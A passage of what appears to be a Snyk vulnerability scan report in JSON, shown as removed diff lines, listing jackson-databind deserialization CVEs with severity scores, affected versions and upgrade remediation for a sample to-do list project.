Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-13T07:41:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.918541Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "UltramanGaia" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2526", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:49.242419Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.692398Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.922905Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", - "epssDetails": { - "percentile": "0.79103", - "probability": "0.00622", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-20330" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-01-03T10:26:22.562970Z", - "functions_new": [ - { - "version": [ - "[2.0,2.9.10.2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-01-03T05:14:08Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-01-03T05:14:08Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.922905Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.5", - "2.9.10.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.5)", - "[2.9.0,2.9.10.3)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": 